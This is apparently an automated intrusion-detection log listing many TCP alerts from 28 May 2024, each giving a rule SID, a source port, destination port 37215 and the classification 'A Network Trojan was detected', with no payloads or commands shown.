            Timestamp:05/28/24-09:57:39.336105
            SID:2829579
            Source Port:55484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804018
            SID:2829579
            Source Port:60790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742552
            SID:2829579
            Source Port:58548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066732
            SID:2829579
            Source Port:47902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046179
            SID:2829579
            Source Port:46054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779095
            SID:2829579
            Source Port:50708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.512849
            SID:2835222
            Source Port:47526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.492839
            SID:2835222
            Source Port:56956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.071778
            SID:2835222
            Source Port:43046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990673
            SID:2829579
            Source Port:57042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.668829
            SID:2829579
            Source Port:49838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506791
            SID:2835222
            Source Port:49526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.328208
            SID:2835222
            Source Port:33264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.846350
            SID:2835222
            Source Port:51414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940377
            SID:2835222
            Source Port:48492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.845325
            SID:2829579
            Source Port:46426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065910
            SID:2829579
            Source Port:46702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834079
            SID:2835222
            Source Port:36876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584177
            SID:2835222
            Source Port:42582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.854105
            SID:2835222
            Source Port:54626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371441
            SID:2829579
            Source Port:55544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.506754
            SID:2835222
            Source Port:45832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423616
            SID:2829579
            Source Port:45198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923500
            SID:2835222
            Source Port:36904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296360
            SID:2829579
            Source Port:36000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869392
            SID:2829579
            Source Port:34940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957171
            SID:2835222
            Source Port:41004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808399
            SID:2835222
            Source Port:57708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809213
            SID:2829579
            Source Port:43310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739094
            SID:2829579
            Source Port:50572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251937
            SID:2835222
            Source Port:36712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.833725
            SID:2835222
            Source Port:39444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052945
            SID:2835222
            Source Port:52758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919465
            SID:2835222
            Source Port:52124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541645
            SID:2829579
            Source Port:44162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.574181
            SID:2829579
            Source Port:45514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.858262
            SID:2829579
            Source Port:56614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432267
            SID:2835222
            Source Port:52170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899520
            SID:2829579
            Source Port:53684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.432980
            SID:2829579
            Source Port:37776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961027
            SID:2835222
            Source Port:50818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842696
            SID:2829579
            Source Port:50222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.913016
            SID:2835222
            Source Port:48922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058518
            SID:2835222
            Source Port:35476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691773
            SID:2835222
            Source Port:46832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.311107
            SID:2835222
            Source Port:49586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.573059
            SID:2835222
            Source Port:37094
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261073
            SID:2835222
            Source Port:55500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000626
            SID:2829579
            Source Port:36890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.485599
            SID:2829579
            Source Port:56984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.740262
            SID:2829579
            Source Port:40002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.464702
            SID:2835222
            Source Port:37560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.908969
            SID:2835222
            Source Port:59820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.935131
            SID:2829579
            Source Port:40370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510861
            SID:2835222
            Source Port:42512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.972576
            SID:2829579
            Source Port:51916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.851140
            SID:2829579
            Source Port:56914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.017440
            SID:2835222
            Source Port:37666
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031088
            SID:2829579
            Source Port:38236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059799
            SID:2835222
            Source Port:56426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.739039
            SID:2835222
            Source Port:36536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893285
            SID:2835222
            Source Port:34328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.773714
            SID:2829579
            Source Port:44552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014869
            SID:2829579
            Source Port:44422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869930
            SID:2829579
            Source Port:42176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434686
            SID:2835222
            Source Port:56230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.053962
            SID:2829579
            Source Port:33464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.829057
            SID:2829579
            Source Port:43110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697310
            SID:2835222
            Source Port:45022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299757
            SID:2835222
            Source Port:44978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769254
            SID:2829579
            Source Port:35122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855479
            SID:2829579
            Source Port:40252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911344
            SID:2835222
            Source Port:38180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563389
            SID:2835222
            Source Port:50262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.564058
            SID:2829579
            Source Port:39980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645072
            SID:2835222
            Source Port:33218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986880
            SID:2835222
            Source Port:39444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.028855
            SID:2835222
            Source Port:59232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883147
            SID:2835222
            Source Port:44752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679740
            SID:2835222
            Source Port:34270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400112
            SID:2835222
            Source Port:52788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989265
            SID:2835222
            Source Port:41404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.295865
            SID:2829579
            Source Port:44702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805708
            SID:2829579
            Source Port:50264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919447
            SID:2835222
            Source Port:55114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.919768
            SID:2835222
            Source Port:55674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542412
            SID:2835222
            Source Port:60330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766021
            SID:2835222
            Source Port:33600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.336536
            SID:2835222
            Source Port:41042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612222
            SID:2829579
            Source Port:44994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:45.602795
            SID:2829579
            Source Port:58318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995237
            SID:2829579
            Source Port:35972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532943
            SID:2829579
            Source Port:53854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.473949
            SID:2829579
            Source Port:57648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.904801
            SID:2835222
            Source Port:54510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.042549
            SID:2829579
            Source Port:38356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967832
            SID:2829579
            Source Port:35854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.849701
            SID:2829579
            Source Port:55564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065273
            SID:2835222
            Source Port:51988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.325958
            SID:2829579
            Source Port:55010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.720254
            SID:2835222
            Source Port:36576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870200
            SID:2829579
            Source Port:47948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066670
            SID:2829579
            Source Port:43430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.125935
            SID:2835222
            Source Port:53630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.725419
            SID:2835222
            Source Port:42652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.046163
            SID:2829579
            Source Port:39322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734397
            SID:2829579
            Source Port:47942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809338
            SID:2829579
            Source Port:43074
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.092039
            SID:2835222
            Source Port:49824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277915
            SID:2829579
            Source Port:47102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850577
            SID:2835222
            Source Port:45746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039431
            SID:2829579
            Source Port:50822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.878651
            SID:2835222
            Source Port:40900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.480949
            SID:2829579
            Source Port:56738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.597372
            SID:2829579
            Source Port:50502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771840
            SID:2835222
            Source Port:60340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.941002
            SID:2835222
            Source Port:47916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027076
            SID:2829579
            Source Port:60706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.341884
            SID:2835222
            Source Port:32816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453780
            SID:2835222
            Source Port:46506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.419293
            SID:2829579
            Source Port:47972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869511
            SID:2829579
            Source Port:34300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.735522
            SID:2835222
            Source Port:57378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453140
            SID:2835222
            Source Port:55634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.238290
            SID:2835222
            Source Port:46600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840904
            SID:2829579
            Source Port:36236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905621
            SID:2835222
            Source Port:36372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.611986
            SID:2829579
            Source Port:43346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560206
            SID:2835222
            Source Port:54942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923832
            SID:2835222
            Source Port:41178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853824
            SID:2829579
            Source Port:41794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887495
            SID:2835222
            Source Port:36522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644327
            SID:2835222
            Source Port:43396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881636
            SID:2829579
            Source Port:57142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776973
            SID:2829579
            Source Port:39950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935462
            SID:2829579
            Source Port:36364
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.926722
            SID:2835222
            Source Port:50606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904152
            SID:2835222
            Source Port:44260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575500
            SID:2835222
            Source Port:34888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.071295
            SID:2829579
            Source Port:39968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.035601
            SID:2829579
            Source Port:51412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936984
            SID:2829579
            Source Port:49222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552697
            SID:2829579
            Source Port:34914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871399
            SID:2835222
            Source Port:59004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064475
            SID:2829579
            Source Port:39380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855592
            SID:2835222
            Source Port:52154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.464519
            SID:2835222
            Source Port:53604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862952
            SID:2829579
            Source Port:33188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.675592
            SID:2835222
            Source Port:46066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.854508
            SID:2829579
            Source Port:38086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.779963
            SID:2835222
            Source Port:34470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930266
            SID:2835222
            Source Port:53590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.346133
            SID:2835222
            Source Port:39504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778172
            SID:2835222
            Source Port:37162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933325
            SID:2829579
            Source Port:55736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260551
            SID:2835222
            Source Port:60868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533162
            SID:2835222
            Source Port:51582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.544183
            SID:2829579
            Source Port:53926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817518
            SID:2829579
            Source Port:53944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765625
            SID:2829579
            Source Port:55208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919083
            SID:2835222
            Source Port:37730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.941753
            SID:2835222
            Source Port:58126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939241
            SID:2829579
            Source Port:57526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.368283
            SID:2829579
            Source Port:36890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.518999
            SID:2835222
            Source Port:58406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880796
            SID:2829579
            Source Port:46166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533766
            SID:2835222
            Source Port:58884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880193
            SID:2829579
            Source Port:56670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.583961
            SID:2835222
            Source Port:58898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734866
            SID:2829579
            Source Port:37204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066608
            SID:2829579
            Source Port:52352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.616263
            SID:2835222
            Source Port:32906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778801
            SID:2829579
            Source Port:42384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.924989
            SID:2829579
            Source Port:46600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.425858
            SID:2829579
            Source Port:55844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856489
            SID:2835222
            Source Port:39326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052526
            SID:2829579
            Source Port:39684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412925
            SID:2829579
            Source Port:33822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.587440
            SID:2829579
            Source Port:56080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556954
            SID:2829579
            Source Port:51694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714548
            SID:2829579
            Source Port:50102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.386198
            SID:2829579
            Source Port:50720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299874
            SID:2835222
            Source Port:56986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.685992
            SID:2829579
            Source Port:44178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850455
            SID:2835222
            Source Port:33766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308252
            SID:2835222
            Source Port:42696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605176
            SID:2829579
            Source Port:39438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.070957
            SID:2829579
            Source Port:52768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.078386
            SID:2829579
            Source Port:41928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.846920
            SID:2835222
            Source Port:53150
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922246
            SID:2835222
            Source Port:53116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505666
            SID:2835222
            Source Port:53456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.016161
            SID:2829579
            Source Port:34456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.934260
            SID:2829579
            Source Port:32984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944359
            SID:2829579
            Source Port:41784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507340
            SID:2829579
            Source Port:49880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989755
            SID:2829579
            Source Port:38446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482560
